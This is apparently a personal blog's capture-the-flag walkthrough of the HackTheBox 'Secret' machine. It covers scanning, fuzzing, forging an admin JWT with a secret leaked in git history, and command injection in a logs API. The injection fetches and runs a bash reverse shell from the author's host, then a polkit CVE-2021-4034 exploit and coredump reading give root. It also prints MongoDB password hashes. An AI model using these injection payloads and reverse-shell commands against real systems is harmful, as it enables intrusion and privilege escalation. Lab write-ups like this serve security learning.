CTF Secret

CTF api
Created At :
Count:1.4k Views 👀 :
  1. /etc/hosts
  2. nmap
  3. rustscan
  4. nmap port 3000
  5. fuzz
  6. API
    1. Register
    2. Login
    3. Token
  7. Download file
  8. See history
  9. Create the token
  10. Login as admin
  11. In the git directory
  12. Add the parameter.
  13. Exploit
    1. create the payload
    2. Listen
    3. Create a http server to download the payload.
    4. Download the payload
    5. Execute the payload
  14. Get root
    1. Download the exploit
      1. On my computer
      2. On the target
      3. Exploit
  15. It’s not finish
    1. Smart enum
  16. ps aux
  17. MongoDB
  18. Decrypt the password
  19. /opt/count
  20. Hint
  21. Spawn 2 shell
  22. apport-unpack

/etc/hosts

10.10.11.120 secret.htb

nmap

nmap -sV -p- 10.10.11.120

nmap is too slow I will try rust

rustscan

https://github.com/RustScan/RustScan

rustscan -a secret.htb  --range 1-10000

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
3000/tcp open  ppp     syn-ack

nmap port 3000

nmap -sV secret.htb -p 3000

PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js (Express middleware)

fuzz

ffuf -w Documents/wordlist/directory-list-2.3-medium.txt -u http://secret.htb/FUZZ

docs                    [Status: 200, Size: 20720, Words: 6752, Lines: 487]
api                     [Status: 200, Size: 93, Words: 12, Lines: 1]
Docs                    [Status: 200, Size: 20720, Words: 6752, Lines: 487]
API                     [Status: 200, Size: 93, Words: 12, Lines: 1]
DOCS                    [Status: 200, Size: 20720, Words: 6752, Lines: 487]

node.js api

API

Register

I’m gonna use a plugin to post my requests, you can do it with curl.

Login

I have a token.

Token

This is mu token:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MWY2Y2U1YzNiMTgxNTA0NjMxOGY5NjAiLCJuYW1lIjoicGVhbnV0IiwiZW1haWwiOiJyb290QHJvb3QuY29tIiwiaWF0IjoxNjQzNTY0NzY2fQ.s-jTYtdx1chd9m2XymrA_tDefcwOciKT8UHNS1H4qHk

I have to decode the second part.

echo "eyJfaWQiOiI2MWY2Y2U1YzNiMTgxNTA0NjMxOGY5NjAiLCJuYW1lIjoicGVhbnV0IiwiZW1haWwiOiJyb290QHJvb3QuY29tIiwiaWF0IjoxNjQzNTY0NzY2fQ" | base64 --decode 

{"_id":"61f6ce5c3b1815046318f960","name":"peanut","email":"root@root.com","iat":1643564766}base64: entrée incorrecte

Maybe I can recreate the payload with
dasith

Download file

http://secret.htb:3000/download/files.zip

See history

https://git-scm.com/book/en/v2/Git-Basics-Viewing-the-Commit-History

git log -p -2

-TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE
+TOKEN_SECRET = secret

And the more important.
href=”https://www.youtube.com/watch?v=dQw4w9WgXcQ”>secure! this has everything to make ur project secure.

Create the token

you have to change the name and set the secret in VERIFY SIGNATURE.

Login as admin

… where is my fucking FLag!!!

In the git directory

I have something to do with logs, but I don’t know how to add a parameter.
https://www.codegrepper.com/code-examples/javascript/req+query+params+express
Now I know lol.

Add the parameter.

Exploit

create the payload

rs.sh

bash -i >& /dev/tcp/10.10.15.22/4846 0>&1

Listen

nc -lvp 4846

Create a http server to download the payload.

python2.7 -m SimpleHTTPServer

Download the payload

http://secret.htb:3000/api/logs?file=;wget http://10.10.15.22:8000/rs.sh

Yeah!

Execute the payload

http://secret.htb:3000/api/logs?file=;bash rs.sh

I have a shell as dashith.

Get root

Download the exploit

On my computer

wget https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py

On the target

wget http://10.10.15.22:8000/pol.py

Exploit

python3 pol.py

It’s not finish

This exploit is a cheat code, it’s too easy and I want to learn.

Smart enum

wget http://10.10.15.22:8000/lse.sh 
sh lse.sh
 LSE Version: 3.9

        User: dasith
     User ID: 1000
    Password: none
        Home: /home/dasith
        Path: /usr/bin:/bin
       umask: 0022

    Hostname: secret
       Linux: 5.4.0-89-generic
Distribution: Ubuntu 20.04.3 LTS
Architecture: x86_64
============================================================( file system )=====
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/opt/count
/snap/snapd/13640/usr/lib/snapd/snap-confine
/snap/snapd/13170/usr/lib/snapd/snap-confine
---
[*] fst100 Useful binaries................................................. yes!
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
===============================================================( software )=====
[*] sof170 Can we access MongoDB databases without credentials?............ yes!

ps aux

ps aux |grep mongo
ps aux |grep mongo
mongodb      863  0.3  1.8 982012 75084 ?        Ssl  19:18   0:06 /usr/bin/mongod --unixSocketPrefix=/run/mongodb --config /etc/mongodb.conf
dasith      9570  0.0  0.0   6432   676 ?        S    19:55   0:00 grep --color=auto mongo

MongoDB

https://stackoverflow.com/questions/24985684/mongodb-show-all-contents-from-all-collections

Nice and short doc, I like it.

dasith@secret:~/local-web$ mongo

And list the db.

show dbs

admin     0.000GB
auth-web  0.000GB
config    0.000GB
local     0.000GB

let’s use auth-web.

use auth-web

And show the collections, is it la tables?

show collections
db.users.find()

{ "_id" : ObjectId("6131bf09c6c27d0b05c16691"), "name" : "theadmin", "email" : "admin@admins.com", "password" : "$2a$10$SJ8vlQEJYL2J673Xte6BNeMmhHBioLSn6/wqMz2DKjxwQzkModUei", "date" : ISODate("2021-09-03T06:22:01.581Z"), "__v" : 0 }
{ "_id" : ObjectId("6131bfb7c6c27d0b05c16699"), "name" : "user222", "email" : "user@google.com", "password" : "$2a$10$WmuQwihUQkzSrRoYakQdI.5hdjo820LNxSfEYATaBoTa/QXJmEbDS", "date" : ISODate("2021-09-03T06:24:55.832Z"), "__v" : 0 }
{ "_id" : ObjectId("6131d73387dee30378c66556"), "name" : "newuser", "email" : "root@dasith.works", "password" : "$2a$10$wnvh2al2ABafCszb9oWi/.YIXHX4RrTUiWAIVUlv2Z80lkvmlIUQW", "date" : ISODate("2021-09-03T08:05:07.991Z"), "__v" : 0 }
{ "_id" : ObjectId("613904ae8a27cb040c65de17"), "name" : "dasith", "email" : "dasiths2v2@gmail.com", "password" : "$2a$10$S/GbYplKgIU4oFdTDsr2SeOJreht3UgIA0MdT7F50EtiBy7ymzFBO", "date" : ISODate("2021-09-08T18:45:02.187Z"), "__v" : 0 }
{ "_id" : ObjectId("61faddebceb4af047698ceff"), "name" : "johnjohn", "email" : "2d5b68c8@hax.com", "password" : "$2a$10$u840Z7TxjF0lVjNmkYNQtOfTuQSBfV32i44FZaQ3Cnw3XcxlO5zSe", "date" : ISODate("2022-02-02T19:39:23.759Z"), "__v" : 0 }
{ "_id" : ObjectId("61fae16eceb4af047698cf13"), "name" : "carambar", "email" : "fb07a043@hax.com", "password" : "$2a$10$4TevfjCfQqSxJhai7njib./hhadYUP7QHbwOEQXJr4O8AW3kWLTc.", "date" : ISODate("2022-02-02T19:54:22.118Z"), "__v" : 0 }
{ "_id" : ObjectId("61fae1eeceb4af047698cf18"), "name" : "carambarcefef", "email" : "e78ece86@hax.com", "password" : "$2a$10$JSZCh0l9KK1m1fyxfsEFR.sN8adWvt5r.0QHHE52yVdbIceEgGLMy", "date" : ISODate("2022-02-02T19:56:30.893Z"), "__v" : 0 }

Whruyyyyy!!!!!!

Decrypt the password

root@dasith.works this use is cool.

$2a$10$wnvh2al2ABafCszb9oWi/.YIXHX4RrTUiWAIVUlv2Z80lkvmlIUQW

I can’t do it, it’s too hard.

/opt/count

I saw this program with the lse script.
When you run it he ask a file to read and tell you this:

I’m trying to read the root flag.
The program can read it.

Hint

I got the flag from a coredump file.
Someone forgot to remove it.
So I have to kill count.

Spawn 2 shell

One shell with the /opt/count
One shelll to kill it

In /var/crash we have this file: _opt_count.1000.crash

apport-unpack

https://askubuntu.com/questions/434431/how-can-i-read-a-crash-file-from-var-crash

apport-unpack _opt_count.1000.crash /tmp/wruyyyyy
````
  
And then:
```sh
strings /tmp/wr*/Cor*

It’s over, it’s faster with polkit exploit.

©2021 Peanutstick’s Blog

Built with Hexo and 3-hexo theme

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme